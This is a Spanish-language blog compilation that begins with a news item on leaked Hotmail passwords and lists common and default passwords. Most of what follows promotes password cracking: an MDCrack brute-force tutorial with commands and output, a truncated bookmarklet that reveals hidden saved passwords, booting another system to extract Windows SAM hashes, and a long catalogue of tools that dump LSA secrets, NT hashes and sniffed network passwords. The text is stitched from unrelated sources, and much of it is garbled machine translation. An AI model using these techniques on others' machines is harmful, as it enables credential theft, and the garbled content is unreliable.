Más de diez mil cuentas de Hotmail fueron colocadas en internet con sus respectivas contraseñas, por lo que se recomienda a los usuarios que cambien sus contraseñas para evitar que sus cuentas sean violadas.De acuerdo con Neowin.com, se trata de un ataque de "phising". Por su parte, Microsoft, propietario del servicio Windows Live Hotmail, dio a conocer a la cadena británica BBC que ya investigan el hecho tras ser alertados del problema.
De acuerdo con la información de Neowin, el pasado 1 de octubre un usuario anónimo colocó las cuentas, con sus contraseñas, en pasterbin.com, un sitio que usan desarrolladores para intercambiar código.
Para este momento, la información ya ha sido eliminada, y de acuerdo con Neowin se confirmó que las cuentas son reales y al parecer son de usuarios europeos.
Las listas de direcciones afectadas abarcan los nombres con iníciales A y B, esto hace suponer que podría haber listas adicionales. Los correos afectados son los tienen las terminaciones @hotmail, @msn.com y @live.com.
Neowin recomendó a los usuarios de cuentas de Windows Live Hotmail que cambien sus contraseñas de inmediato.
Fuente: e-consulta.com
Según un estudio realizado por la revista PC Magazine, los usuarios de Internet suelen utilizar normalmente las mismas contraseñas para todas sus cuentas, ya sean de correo o de cualquier otro tipo.Si usted observa que su contraseña se encuentra en alguna estas listas, por favor, cámbiela de inmediato.
Parte de la lista de contraseñas PUBLICADA EN PASTEBIN
- 123456
- 123456789
- alejandra
- 111111
- alberto
- tequiero
- alejandro
- Alejandro
- 12345678
- 1234567
- estrella
- iloveyou
- Alberto
- daniel
- 000000
- roberto
- 654321
- bonita
- sebastian
- beatriz
- mariposa
- america
- andrea
- Felicidad
- 555555
- Amigos
- brujita
- america
- América
- arturo
- Princesa
- 666666
- BETITO
- Betito
- mariposa
- 777777
- ricardo
- asdfgh
- rosita
- Rosita
- Piscis
- Caballo
- cristina
- gatito
- 112233
- angelica
- junior
- 123123
- barbara
- Libertad
- adriana
- angelito
- carolina
- 654321
- felipe
- Ximena
- paloma
- Paloma
- Esperanza
Las contraseñas más habituales
1. passwod2. 123456
3. qwerty
4. abc123
5. letmein
6. monkey
7. myspace1
8. password1
9. blink182
10. (el nombre del usuario)
lista de contraseñas predefinidas:
!@#$
!@#$%
000000
00000000
007
110
111
111111
11111111
121212
123
123123
1234
12345
123456
1234567
12345678
123456789
123abc
123asd
2002
2003
2600
321
54321
654321
666666
888888
88888888
aaa
abc
abc123
abcd
abcdef
abcdefg
Admin
admin123
administrator
alpha asdf
asdfgh
computer
database
enable
god
godblessyou
guest
home
Internet
login
love
mypass
mypass123
mypc
mypc123
oracle
owner
pass
passwd
password
pw123
pwd
root
secret
server
sex
sql
super
sybase
temp
temp123
test
test123
win
xxx
yxcv
zxcv
Contraseñas utilizadas por usuarios rusos
- 1234567
- 12345678
- 123456
- <пустая строка>
- 12345
- 7654321
- qweasd
- 123
- qwerty
- 123456789
- 1234
- 7777777
- 111111
- 87654321
- 1111111
- 1
- 987654321
- 11111111
- 111
- 88888888
- 123321
- 1234567890
- 22222222
- 5555555
- 123123
- 9876543
- qaz
- 777
- 666
- 77777777
- 55555555
- consult
- 98765432
- 1111
- 33333333
- 3333333
- 666666
- 555555
- 2345678
- 2222222
- 11111
- qwert
- 55555
- 12345Ab
- 777777
- 99999999
- 9999999
- 23456789
- 8888888
- zxcvbnm
“Aproximadamente uno de cada nueve personas por lo menos utiliza una contraseña en la lista, Y uno de cada 50 personas utiliza una de las 20 primeras peores contraseñas”.
Hay algunas claves interesantes en esta lista que muestran cómo la gente trata de ser inteligente, pero incluso el ingenio humano es predecible. Por ejemplo, mire las siguientes contraseñas:
- ncc1701 El buque número ncc1701 de Starship Enterprise
- thx1138 El nombre de la primera película de George Lucas
- qazwsx un simple patrón de los teclados QWERTY
- 666666 el números seis, seis veces
- 7777777 siete sietes
- ou812 El título de un álbum de Van Halen 1988
- 123456
- password
- 12345678
- 1234
- pussy
- 12345
- dragon
- qwerty
- 696969
- mustang
- etmein
- baseball
- letmein
- master
- michael
- football
- shadow
- monkey
- abc123
- fuckme
- 6969
- jordan
- harley
- ranger
- iwantu
- jennifer
- hunter
- fuck
- 2000
- test
- batman
- trustno1
- homas
- tigger
- robert
- access
- love
- buster
- 1234567
- soccer
- hockey
- killer
- george
- sexy
- andrew
- charlie
- superman
- asshole
- fuckyou
- dallas
- jessica
- panties
- pepper
- 1111
- austin
- william
- daniel
- golfer
- summer
- heather
- hammer
- yankees
- joshua
- maggie
- biteme
- enter
- ashley
- thunder
- cowboy
- silver
- richard
- fucker
- orange
- merlin
- asshole
- corvette
- bigdog
- cheese
- matthew
- 121212
- patrick
- martin
- freedom
- ginger
- blowjob
- nicole
- sparky
- yellow
- camaro
- secret
- dick
- falcon
- taylor
- 111111
- 131313
- 123123
- bitch
- hello
- scooter
- please
NO | Top 1-100 | Top 101–200 | Top 201–300 | Top 301–400 | Top 401–500 |
1 | 123456 | porsche | firebird | prince | rosebud |
2 | password | guitar | butter | beach | jaguar |
3 | 12345678 | chelsea | united | amateur | great |
4 | 1234 | black | turtle | 7777777 | cool |
5 | pussy | diamond | steelers | muffin | cooper |
6 | 12345 | nascar | tiffany | redsox | 1313 |
7 | dragon | jackson | zxcvbn | star | scorpio |
8 | qwerty | cameron | tomcat | testing | mountain |
9 | 696969 | 654321 | golf | shannon | madison |
10 | mustang | computer | bond007 | murphy | 987654 |
11 | letmein | amanda | bear | frank | brazil |
12 | baseball | wizard | tiger | hannah | lauren |
13 | master | xxxxxxxx | doctor | dave | japan |
14 | michael | money | gateway | eagle1 | naked |
15 | football | phoenix | gators | 11111 | squirt |
16 | shadow | mickey | angel | mother | stars |
17 | monkey | bailey | junior | nathan | apple |
18 | abc123 | knight | thx1138 | raiders | alexis |
19 | pass | iceman | porno | steve | aaaa |
20 | fuckme | tigers | badboy | forever | bonnie |
21 | 6969 | purple | debbie | angela | peaches |
22 | jordan | andrea | spider | viper | jasmine |
23 | harley | horny | melissa | ou812 | kevin |
24 | ranger | dakota | booger | jake | matt |
25 | iwantu | aaaaaa | 1212 | lovers | qwertyui |
26 | jennifer | player | flyers | suckit | danielle |
27 | hunter | sunshine | fish | gregory | beaver |
28 | fuck | morgan | porn | buddy | 4321 |
29 | 2000 | starwars | matrix | whatever | 4128 |
30 | test | boomer | teens | young | runner |
31 | batman | cowboys | scooby | nicholas | swimming |
32 | trustno1 | edward | jason | lucky | dolphin |
33 | thomas | charles | walter | helpme | gordon |
34 | tigger | girls | cumshot | jackie | casper |
35 | robert | booboo | boston | monica | stupid |
36 | access | coffee | braves | midnight | shit |
37 | love | xxxxxx | yankee | college | saturn |
38 | buster | bulldog | lover | baby | gemini |
39 | 1234567 | ncc1701 | barney | cunt | apples |
40 | soccer | rabbit | victor | brian | august |
41 | hockey | peanut | tucker | mark | 3333 |
42 | killer | john | princess | startrek | canada |
43 | george | johnny | mercedes | sierra | blazer |
44 | sexy | gandalf | 5150 | leather | cumming |
45 | andrew | spanky | doggie | 232323 | hunting |
46 | charlie | winter | zzzzzz | 4444 | kitty |
47 | superman | brandy | gunner | beavis | rainbow |
48 | asshole | compaq | horney | bigcock | 112233 |
49 | fuckyou | carlos | bubba | happy | arthur |
50 | dallas | tennis | 2112 | sophie | cream |
51 | jessica | james | fred | ladies | calvin |
52 | panties | mike | johnson | naughty | shaved |
53 | pepper | brandon | xxxxx | giants | surfer |
54 | 1111 | fender | tits | booty | samson |
55 | austin | anthony | member | blonde | kelly |
56 | william | blowme | boobs | fucked | paul |
57 | daniel | ferrari | donald | golden | mine |
58 | golfer | cookie | bigdaddy | 0 | king |
59 | summer | chicken | bronco | fire | racing |
60 | heather | maverick | penis | sandra | 5555 |
61 | hammer | chicago | voyager | pookie | eagle |
62 | yankees | joseph | rangers | packers | hentai |
63 | joshua | diablo | birdie | einstein | newyork |
64 | maggie | sexsex | trouble | dolphins | little |
65 | biteme | hardcore | white | 0 | redwings |
66 | enter | 666666 | topgun | chevy | smith |
67 | ashley | willie | bigtits | winston | sticky |
68 | thunder | welcome | bitches | warrior | cocacola |
69 | cowboy | chris | green | sammy | animal |
70 | silver | panther | super | slut | broncos |
71 | richard | yamaha | qazwsx | 8675309 | private |
72 | fucker | justin | magic | zxcvbnm | skippy |
73 | orange | banana | lakers | nipples | marvin |
74 | merlin | driver | rachel | power | blondes |
75 | michelle | marine | slayer | victoria | enjoy |
76 | corvette | angels | scott | asdfgh | girl |
77 | bigdog | fishing | 2222 | vagina | apollo |
78 | cheese | david | asdf | toyota | parker |
79 | matthew | maddog | video | travis | qwert |
80 | 121212 | hooters | london | hotdog | time |
81 | patrick | wilson | 7777 | paris | sydney |
82 | martin | butthead | marlboro | rock | women |
83 | freedom | dennis | srinivas | xxxx | voodoo |
84 | ginger | fucking | internet | extreme | magnum |
85 | blowjob | captain | action | redskins | juice |
86 | nicole | bigdick | carter | erotic | abgrtyu |
87 | sparky | chester | jasper | dirty | 777777 |
88 | yellow | smokey | monster | ford | dreams |
89 | camaro | xavier | teresa | freddy | maxwell |
90 | secret | steven | jeremy | arsenal | music |
91 | dick | viking | 11111111 | access14 | rush2112 |
92 | falcon | snoopy | bill | wolf | russia |
93 | taylor | blue | crystal | nipple | scorpion |
94 | 111111 | eagles | peter | iloveyou | rebecca |
95 | 131313 | winner | pussies | alex | tester |
96 | 123123 | samantha | cock | florida | mistress |
97 | bitch | house | beer | eric | phantom |
98 | hello | miller | rocket | legend | billy |
99 | scooter | flower | theman | movie | 6666 |
100 | please | jack | oliver | success | albert |
Como hacer buenas contraseñas /blog-g-mail./contraseñas seguras.
Las contraseñas de los equipos no se guardan directamente en un archivo, por motivos de seguridad; si fuera de esta manera, sería cosa de conocer la dirección del archivo en el disco duro, para abrirlo y poder tener acceso al mismo, o sea bastante ridículo.
Por este motivo, es que las contraseñas o passwords se almacenan de manera encriptada (no de manera convencional).
Comenzando con el sistema mismo, por ejemplo Windows, las encripta en un archivo SAM, que reside en algún lugar de la carpeta SYSTEM (windows/system32/congigure/SAM, dependiendo de la versión de Windows) y/o en el mismo registro del sistema.
El método de encriptación creando estos archivos "hash", opera de tal manera que la información que ingresa el usuario como contraseña, "rebota" por así decirlo contra el registro del sistema y el mismo archivo, creando una cadena única de caracteres; o sea puedes abrir estos archivos SAM y verlos en el block de notas, pero no existe método mecánico ni método o tabla para descifrarlos.
La mayoría de los intentos de búsqueda de contraseñas, en realidad son intentos de hackeo de una computadora ajena,de la oficina o de otra persona, por lo que en cualquier foro serio se evitan las instrucciones detalladas para realizar ataques sobre el sistema; sólo te mencionaré a modo informativo lo que se hace.
Para recuperar genuinas contraseñas extraviadas, el proceso emplea ataques de "fuerza bruta", por ejemplo del tipo "ataque de diccionario" (un nombre bonito para sencillamente ir probando de manera automática con las palabras del diccionario ataques al archivo hash SAM), o sistemas tipo "rainbow tables" que utilizan debilidades en intercambios de memoria interna. Existen programas que realizan estas operaciones, sin prometer éxito, para recuperar las contraseñas. También se pueden instalar sistemas operativos alternativos como Linux, para acceder al sistema desde ellos, obtener los hash files y de allí trabajar sobre ellos.
Aparte de las contraseñas administradas por el sistema, algunas aplicaciones guardan contraseñas de campos y formularios mediante su propia fórmula. Por ejemplo en Firefox puedes ver las contraseñas guardadas para los sitios que utilizas llendo a "opciones", "seguridad", y "contraseñas guardadas", seleccionando luego la opción "mostrar contraseñas". O sea si compartes tu computadora, no te recomiendo escojas la opción de guardar las contraseñas.
Lo anterior te debe dar una buena idea sobre cómo y dónde se guardan las contraseñas en los equipos, y la seguridad involucrada.
la criptografía propiamente dicha, como sus técnicas complementarias, entre las cuales se incluye el criptoanálisis, que estudia métodos empleados para romper textos cifrados con objeto de recuperar la información original en ausencia de las claves.
La criptografía es utilizada para la proteger la información sensible de usuarios no autorizados, en una de ramas se encuentran los algoritmos de hash los cuales se encargan de asignan un valor numérico a cada carácter dentro del texto/archivo y generar un “hash” único (en teoría) para este.
En esta entrada pretendo recopilar los distintos métodos que tenemos para recuperar una clave o texto codificado con el algoritmo MD5, uno de los mas utilizados actualmente .
Antes de empezar definamos qué es MD5:
Es uno de los algoritmos de reducción criptográficos diseñados por el profesor Ronald Rivest del MIT (Massachusetts Institute of Technology, Instituto Tecnológico de Massachusetts), Ampliamente utilizado en aplicaciones web (principalmente para almacenar contraseñas), para verificar la integridad de archivos y en.
Descubre las contraseñas ocultas tras asteriscos en tu navegador
¿A quién no le ha pasado que ha guardado sus contraseñas de acceso a una determinada web en el navegador y con el paso del tiempo se ha acabado olvidando de ellas? Ese problema tiene fácil solución gracias a un código Javascript que nos revela lo que hay oculto tras los asteriscos. Únicamente es necesario poner el código en la barra de direcciones, olvídate de cualquier tipo de descarga. javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j
Cuando lo introduces se abrirá un popup que te informará de la contraseña en cuestión. Según parece este método funciona tanto con Firefox como Internet Explorer, Netscape y Opera.
Via bitelia
MessenPass, recupera las contraseñas de tu messenger
La mayoría de usuarios empleamos al menos un programa de mensajería instantánea para hablar con nuestros amigos. Existen múltiples clientes y distintos protocolos, pero el más popular de ellos es el Windows Live Messenger de Microsoft. MessenPass puede recuperar las contraseñas de usuario de las aplicaciones de mensajería instantánea instaladas en el ordenador. Sólo funciona si el usuario ha empleado la opción de recordar contraseña anteriormente. Y en ningún caso la aplicación funciona para conocer las contraseñas de otros usuarios.MessenPass ofrece soporte para múltiples aplicaciones de mensajería instantánea. Las más populares son MSN Messenger, Windows Messenger (para Windows XP), Windows Live Messenger (para Windows XP y Windows Vista), Yahoo Messenger (en sus versiones 5.x y 6.x) y Google Talk. Pero MessenPass ofrece también soporte para ICQ Lite (4.x, 5.x y 2003), AOL Instant Messenger 4.6 o inferior, AIM 6.x, AIM Pro, Trillian, Miranda, GAIM (Pidgin), MySpace IM, PaltaklScene y Digsby.
No es necesario instalar esta herramienta para ser utilizada. Basta con ejecutar el archivo mspass.exe para iniciar la detección automática de las aplicaciones de mensajería instantánea instaladas en el ordenador. Si por cualquier motivo alguna aplicación no fuera detectada, MessenPass permite la detección manual de las aplicaciones desde el menú File -> Select Folders.
Si no deseas utilizar ninguna interfaz de usuario, MessenPass ofrece la posibilidad de ser empleado desde la línea de comandos. Además es una herramienta freeware (gratuita) y está traducida al español.
Enlace: MessenPass
Via bitelia
Métodos para recuperar una Clave en MD5
Ataque de Fuerza Bruta
El MD5 es un algoritmo unidireccional (permite codificar mas no decodificar), por eso para validar las entradas es necesario pasarlas primero por el algoritmo para después comparar el hash generado con el que esta almacenado previamente, una de las primeras ideas que nos llega a la mente para “decodificar” algo en MD5 es realizar un ataque por fuerza bruta, donde codifiquemos caracteres desde aaaaaaa…a hasta zzzzzzz…z comparando con el hash que tenemos para ver si coincide.Existen portales que se dedican a realizar este ataque de fuerza bruta y a almacenar en su base de datos la cadena de caracteres con su respectivo hash en MD5 por lo tanto lo primero que debemos hacer es comprobar si el hash que tenemos ya ha sido almacenado en alguna de estas bases de datos, si es asi podremos ahorrarnos mucho tiempo.
Bases de Datos para crackear MD5
Aquí les dejo un listado con las bases de datos con mas registros, este es el primer paso que se debe realizar solo tendremos que colocar el hash en el campo de texto y consultar si este ya esta en la base de datos, no es demorado y puede ahorrarnos mucho tiempo (click en la imagen para visitar la pagina).Software para Realizar Ataques de Fuerza Bruta a claves con MD5
Si la búsqueda en las bases de datos no te arrojo resultados positivos puedes realizar el ataque desde tu propia maquina, existe mucho software que puedes utilizar para este fin.En mi experiencia personal el mejor programa para realizar ataques de fuerza bruta a una clave codificada con MD5 es el MDCRACK así que solo realizare un pequeño tutorial de como manejar este software.
Lo primero que debemos hacer es descargar el MDCRACK de la pagina oficial lo descomprimimos e iniciamos un terminal (inicio/ejecutar/cmd.exe) ubicándonos en la carpeta donde tengamos el archivo MDCrack-sse.exe y ejecutamos el comando
MDCrack-sse.exe f4d09a31cd15e26c0a150e595511c90e
En la mayoría de los casos esa configuración es la apropiada ya que no es muy común (lamentablemente) encontrar passwords de mas de 8 caracteres y con S!m&ol@s.
Despues empezara a aparecer en pantalla algo parecido a esto:
Password size: 1
Password size: 2
Password size: 3
Password size: N..
Hasta que aparezca el resultado del ataque
----------------------------------------
Collision found ! => Comunidad DragonJAR (este es el password en md5 crackeado)
Si no te aparece el resultado deberás introducir una configuración personalizada:
Si queremos que además de minúsculas, MAYÚSCULAS y nu3r0s aparezcan también S!m&ol@s debemos ingresar lo siguiente en consola:
MDCrack-sse.exe -s abcdefghijklmnopqrstuvwxyzABCDEFGHIJKMNOPQRSTUVWXYZ0123456789!&@ f4d09a31cd15e26c0a150e595511c90e
Puedes realizar las combinaciones que quieras, por ejemplo si sabes que la mayoría de claves se escriben en minúscula puedes ahorrarte mucho tiempo colocando como parámetro solo las minúsculas.
Si quieres pausar la tarea y resumir mas tarde solo tienes que crear la carpeta c:\temp en esta se guardara lo que llevas, cuando quieras resumir ejecuta el MDCrack sinr ningún parámetro el revisara la carpeta y continuara el trabajo.
Es recomendado también si quieres otras tareas en el equipo mientras realizas el ataque es recomendable que le asignes una prioridad de “muy bajo” al proceso desde el administrador de tareas, de lo contrario tu pc quedara muy lento por la cantidad de recursos que consume el mdcrack y no podras hacer nada mas.
Originalmente el mdcrack solo esta disponible por linea de comandos, pero existen varios front ends realizados por terceros para las personas que no son muy amigas de la consola, el mas completo es este frontend en VB desarrollado por nulladd con el cual puedes configurar fácilmente los parámetros de este programa pero en la pagina del proyecto encontraras otros.
El MDCrack funciona sin ningun problema con wine por lo que el sistema operativo no es una limitación.
Pagina Oficial del MDCrack
Con esto termino el pequeño tutorial sobre MDCrack, ahora les daré un listado de otras herramientas utilizadas para realizar ataques de fuerza bruta a hash en MD5.
Pagina Oficial de Cain & Abel
Documentacion del Cain & Abel
Elf Wizard The Ripper MD5
Este es un proyecto elaborado por WHK el cual consiste en un sistema basado PHP donde se ingresa una serie de palabras con sus respectivos hashes en MD5 a una base de datos en MySQL, lo que diferencia este sistema de las bases de datos es que permite ingresar listas de palabras, y ademas sacar palabras de búsquedas especificas en google o de cualquier pagina web.
Pagina Oficial del Elf Wizard The Ripper MD5
Via dragonjar
Windows Password Recovery Bootdisk
Visiуn generalLa solución general del problema de contraseñas olvidadas incluye los siguientes pasos:Paso 1: Crear el disco de inicio para recuperar los hash de las contraseñas utilizando Windows Password Recovery Bootdisk Creator. Paso 2: Iniciar desde el disco de inicio el equipo donde ha perdido la contraseña. Todos los hash de las contraseñas de Windows serán recuperados automáticamente y almacenados en su disco de inicio (o impresas en la pantalla en caso de uso de CD como disco de inicio). Paso 3: Envíe los hash de las contraseñas recuperados de su sistema a Windows Password Recovery Service , para recuperar las contraseñas originales de los usuarios. Software relacionadoCaracterнsticas y ventajas
Interfaz de usuarioPara iniciar la recuperación de los hash de las contraseñas de Windows necesita crear un disco de inicio con ayuda de Windows Password Recovery Bootdisk Creator. Esta herramienta tiene asistente de interfaz y permite crear discos de inicio en disquetes, CD o flash USB.Para iniciar desde su disco de inicio necesita entrar en BIOS, presionando la tecla SUPR., mientras el equipo se inicia, después establecer en la secuencia de inicio el orden necesario, o sea que el CD, el disquete (A:) o el flash USB sean primeros en la secuencia. Algunos BIOS pueden referirse a su disco flash como disquete USB o zip USB. Las versiones viejas de BIOS pueden no permitir el inicio desde el flash USB, en este caso podrá iniciarse sólo desde CD o disquete. Después de configurar su BIOS y reiniciarse, la herramienta Windows Password Recovery Bootdisk recuperará los hash de las contraseñas de Windows automáticamente. Cuando el disco de inicio termine su función, podrá recuperar las contraseñas originales de los usuarios de Windows por medio de Windows Password Recovery Service. Requisitos de sistemaWindows Password Recovery Bootdisk puede recuperar los hash de las contraseñas de los usuarios de Windows NT / 2000 / XP / 2003, tanto en discos duros IDE como en SATA / SCSI con sistema de archivo FAT o NTFS. El disco de inicio recupera los hash de las contraseñas almacenados en el Administrador de cuentas de seguridad (SAM) del equipo local, no es compatible con Active Directory. Puede crear discos de inicio de Windows 9x / ME / NT / 2000 / XP / 2003, en CD, disquetes o flash USB con ayuda de Windows Password Recovery Bootdisk Creator.Via Rixler sofware Averigua la contraseña de Windows en 5 minutos |
Recuperar contraseña
Todos los softwares mostrados en esta pagina son totalmente legales y de uso personal únicamente.
Advanced RAR Password Recovery
Recupera tus contraseñas de archivos *.rar
Advanced PDF Password Recovery
Los decrypts protegieron archivos del pdf del acróbata del adobe.
Advanced Office XP Password Recovery Pro
Recupera la contraseña que protege a tus documentos creados en Microsoft Office XP
Advanced PDF Password Recovery Pro
Otro programa para recuperar la contraseña que protege a tu documento PDF.
Advanced ZIP Password Recovery
Recuperación de contraseñas perdidas de:
- PKZip
- WinZip
Asterisk Logger
Revela las contraseñas detrás de los asteriscos (***)
AsterWin IE
Muestra las contraseñas ocultas tras los asteriscos de las paginas webs. Funciona desde Internet Explorer 5 en adelante. Codigo fuente en Visual Basic para su ejecución y estudio.
Access PassView
Recupera la contraseña que protege archivos .mdb creados por:
- Microsoft Access 95
- Microsoft Access 97
- Microsoft Access 2000
- Microsoft Access XP
- Jet Database Engine 3.0
- Jet Database Engine 4.0
AspNetUserPass
Revela la contraseña del usuario "AspNet"
BIOS Password Remover
Recupera tu bios AWARD removiendo la contraseña. Solo para Windows Win9x/ME.
Por sistemas de seguridad en la web del autor... solo es posible bajar el programa copiando el link y pegandolo en el explorador.
http://www.infogreg.com/crapware/junkcode/files/bios_pass_remover.zip
Cain & Abel
Cain y Abel es una herramienta de la recuperación de la contraseña para los sistemas operativos de Microsoft. Permite la recuperación fácil de la varia clase de contraseñas sniffeando la red, crackeando contraseñas cifradas usando los ataques del diccionario, de la fuerza bruta y del criptoanálisis, conversaciones de registración de VoIP, contraseñas revueltas el descifrar, recuperando las llaves sin hilos de la red, cajas de la contraseña que revelan, destapando contraseñas depositadas y analizando protocolos de la encaminamiento. El programa no explota ningunas vulnerabilidades o bugs del software que no se podrían fijar con poco esfuerzo.
- Remote Console
- Remote LSA Secrets Dumper
- Remote NT Hashes Dumper
- Remote Route Table Manager
- Remote TCP/UDP Table Viewer
- Cisco Config Downloader/Uploader
- MAC Scanner
- Network Enumerator
- Password Crackers
- Brute-Force Password Cracker
- Dictionary Password Cracker
- Cryptanalysis
- Rainbowcrack-online
- WEP Cracker
- Password Decoders
- Password Dumpers
- Password/Hash Calculators
- Promiscuous-mode Scanner
- Route Table Manager
- Service Manager
- SID Scanner
- Sniffer
- TCP/UDP Table Viewer
- Traceroute
- Wireless Scanner
Dialupass
Recupera el nombre de usuario mas la contraseña de las conexiones atraves de la linea telefonica tales como las conexiones de:
- Terra 64Kb
- Telefonica speedy 2 Mb
- Telefonica speedy 1 Mb
- Telefonica speedy 128Kb
- Telmex 1 Mb
- Etc etc etc...
- Tipo Dialup/RAS/VPN
Enterprise Manager PassView
Recupera la contraseña de servidores SQL:
- SQL Server 7.0
- SQL Server 2000
FileMaker Password Recovery
Recupera las contraseñas perdidas u olvidadas para las bases de datos de FileMaker.
Google Talk Password Recovery
Recupera tus contraseñas de Google Talk.
IE PassView
Recupera las contraseñas guardadas por:
- Internet Explorer 4.0
- Internet Explorer 6.0
- Internet Explorer 7.0
iOpus Password Recovery XP
Recupera las contraseñas guardadas en Windows XP
LSASecretsView
Recupera las contraseñas guardadas en HKEY_LOCAL_MACHINE\Security\Policy\Secrets. Probado en Windows XP y Windows Vista 32 y 64 bits (entre otras cosas te revela la contraseña de usuario por defecto con el que inicias seción).
MessenPass
Recupera passwords perdidos de los siguientes mensajeros instantaneos:
- MSN Messenger
- Windows Messenger (In Windows XP)
- Windows Live Messenger (In Windows XP And Vista)
- Yahoo Messenger (Versions 5.x, 6.x, 7.x y 8.x)
- Google Talk
- ICQ Lite 4.x/5.x/2003
- AOL Instant Messenger (only older versions, the password in newer versions of AIM cannot be recovered)
- AOL Instant Messenger/Netscape 7
- Trillian
- Miranda
- GAIM
Mail PassView
Recupera las contraseñas perdidas de correos tales como:
- Outlook Express
- Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
- Microsoft Outlook 2002/2003/2007 (POP3, IMAP, HTTP and SMTP Accounts)
- Windows Mail
- IncrediMail
- Eudora
- Netscape 6.x/7.x
- Mozilla Thunderbird
- Group Mail Free
- Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
- Hotmail/MSN mail - If the password is saved in MSN Messenger application.
- Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.
MD5 Password
Herramienta de la recuperación de la contraseña para los profesionales de la seguridad, que pueden ser utilizados para recuperar una contraseña si se sabe su hash MD5.
Network Password Recovery
Cuando conectas con una parte de la red en tu LAN o con tu cuenta de Passport .NET, Windows permite que ahorres tu contraseña para utilizarla adentro cada vez que conectas el servidor alejado. Esta utilidad recupera todas las contraseñas de la red almacenadas en tu sistema para usuarios ya logueados. contraseñas que esta utilidad puede recuperar:
- Login passwords of remote computers on your LAN.
- Passwords of mail accounts on exchange server (stored by Outlook 2003)
- Password of MSN Messenger / Windows Messenger accounts
- Internet Explorer 7: passwords of password-protected Web sites ("Basic Authentication" or "Digest Access Authentication")
- The item name of IE7 passwords always begin with "Microsoft_WinInet" prefix.
Netscapass
Recupera contraseñas guardadas por Netscape tales como la contraseña de servidores POP3. Versiones soportadas:
- Netscape Communicator 4.x
- Netscape 6.x
- Netscape 7.x
Ophcrack
Aplicación que permite obtener las contraseñas de tu sistema Windows basado en el Ophcrack 1.0, disponible tanto para Windows como para Linux graciasa las libretrías GTK.
En otras palabras Ophcrack es un Crackeador de Passwords en Windows basada en time-memory trade-off usando raibon tables, una nueva variante de la compensación original de Hellman, recupera 99.9% de contraseñas alfanuméricas en segundos.
Entre otras cosas es capaz de crackear la contraseña del administrador en Windows Vista.
Passware Password Recovery Kit
Pack muy completo para recuperar infinidad de contraseñas desde mensajeros hasta documentos word, pdf, etc etc
PasswordNow
Recupera las contraseñas de documentos protegidos como:
- Microsoft Word
- Microsoft Excel
- Microsoft Outlook
- Microsoft MS Access
Password Recovery Tools
Recupera las contraseñas de:
- Access
- Act!
- Excel
- Outlook
- Word
- Backup
- MS Money
- Lotus Organizer
- MS Project
- Schedule+
- VBA modules (any applications)
- Power Point
- Quicken
- QuickBooks
- OneNote
- zip/WinZip/pkzip/7zip
PCAnywhere PassView
Recupera la contraseña guardada por pcANYWHERE en los siguientes tipos de archivos:
- Caller Files .cif
- Remote Control Files .chf
- Be A Host Files .bhf
- Gateway Files .gwf
- Online Service Files .osf
Protected Storage PassView
revela las contraseñas almacenadas en tu computadora por:
- Outlook
- AutoComplete passwords in Internet Explorer
- Password-protected sites in Internet Explorer
- MSN Explorer Passwords
ProduKey
Recupera los seriales perdidos de los siguientes productos instalados (CD-Key):
- MS-Office
- Microsoft Windows
- Exchange Server
- SQL Server
Recupera la contraseña del administrador de Windows.
- Windows Password recovery
- Petter Nordahl-Hagen’s Offline NT Password & Registry Editor
- Openwall’s John the Ripper
- EBCD – Emergency Boot CD
- Austrumi
- Cia commander
Remote Desktop PassView
Recupera la contraseña guardada por "Microsoft Remote Desktop" utilizada para la administración remota
Sam Inside
El programa de SAMInside se señala para recuperar las contraseñas de los usuarios de Windows NT /2000/XP/2003 y tiene algunas características excepcionales: El programa tiene tamaño pequeño, no requiere la instalación y se puede funcionar del diskette, CD/DVD-disk o USB-conduce. Incluye sobre 10 tipos de importación de los datos y 6 tipos de ataque de las contraseñas:
- Brute-force attack
- Distributed attack
- Mask attack
- Dictionary attack
- Hybrid attack
- Pre-calculated tables attack
Forzando código del programa se escribe totalmente en el ensamblador qué deja para conseguir extremadamente la velocidad de la contraseña que fuerza procedimiento en cualquier procesador. El programa extrae correctamente los nombres y las contraseñas de los usuarios de Windows NT /2000/XP/2003 en la codificación del símbolo nacional. ¡El programa es la primera utilidad en el mundo que comenzó a trabajar con las contraseñas cifradas por la llave SYSKEY del sistema!
+Info: http://www.insidepro.com/eng/saminside.shtml
SniffPass
utilidad que escucha tu red, captura las contraseñas que pasan a través de tu adaptador de la red, y las exhibe en la pantalla inmediatamente. SniffPass puede capturar las contraseñas de los protocolos siguientes (Puedes utilizar esta utilidad para recuperar contraseñas perdidas de Web/FTP/Email (contraseñas básicas de la autentificación)):
- POP3
- IMAP4
- smtp
- ftp
- HTTP
SQL Password
Recupera la contraseña de los siguientes tipos de Servidores SQL:
- MS SQL Server 2000
- MS SQL Server 2005
- MS SQL Server 2005
- MS SQL Server Express
- MS SQL Server MSDE 2000 (Microsoft SQL Server Desktop Engine).
SHA-1 Password
Herramienta de la recuperación de la contraseña para los profesionales de la seguridad, que pueden ser utilizados para recuperar una contraseña si se sabe su hash SHA-1.
stPassword
Recupera la contraseña perdida del archivo de Outlook .PST (las carpetas personales). No tienes que instalar Ms-Outlook para utilizar esta utilidad. Necesitas solamente el archivo original de PST. Esta utilidad puede recuperar las contraseñas de PST:
- Outlook 97
- Outlook 2000
- Outlook XP
- Outlook 2003
Win9x PassView
Programa que revela los passwords guardados en Windows 95 y 98 tales como:
- The user name and the password of the current logged-on user.
- The cached passwords of the current logged-on user.
- The passwords of your network shares (Only with share-level access control).
- The password of the screen saber.
WirelessKeyView
Recupera todas las contraseñas de la (WEP/WPA) almacenadas en tu computadora por el servicio "Wireless Zero Configuration" y "WLAN AutoConfig" de Windows Vista.
WinHKI
Programa que funciona como compresor y descompresor, ademas de funcionar como Crackeador y desenriptador para archivos:
- HKI1
- HKI2
- HKI3
- BH
- CAB
- GZip
- LHA
- JAR
- TAR
- ZIP
- BZ2
- RAR
- ACE Via trucos windows
Aquí vamos a tratar de conocer el nombre y la contraseña de los usuarios configurados en un ordenador. También veremos como podemos entrar en un sistema en donde hemos olvidado la contraseña (olvidar contraseña).
1.- crack password ntxp2k
Para empezar vamos a utilizar un programa clásico: ntxp2k de John the Ripper.
Tiene una limitación muy importante, y es que el Servicio de Seguridad: lsass sólo permite que acceda a la clave SAM del Registro, que es donde está las contraseñas, al Administrador.
Bajar ntxp2k.zip (649 K) de John the Ripper
